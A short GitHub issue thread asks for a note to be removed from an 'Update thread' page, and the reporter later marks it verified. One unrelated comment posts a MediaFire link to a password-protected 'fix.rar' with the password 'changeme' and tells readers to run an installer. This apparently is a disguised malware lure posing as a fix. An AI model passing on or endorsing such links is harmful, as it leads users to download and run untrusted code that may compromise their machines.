### ISSUE TITLE
Update thread : Remove below note from Update thread 

### ISSUE THREAD

**Issue by rupalichavan9860** [the-canonizer/Canonizer-Beta--Issue-Tracking#1132]
Please refer below screenshot : 

![image](https://github.com/user-attachments/assets/520c465b-cb8e-4b96-8944-b3810533a4b6)

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rupalichavan9860** [comment]
Verified

**Comment by rupalichavan9860** [comment]
Verified on live
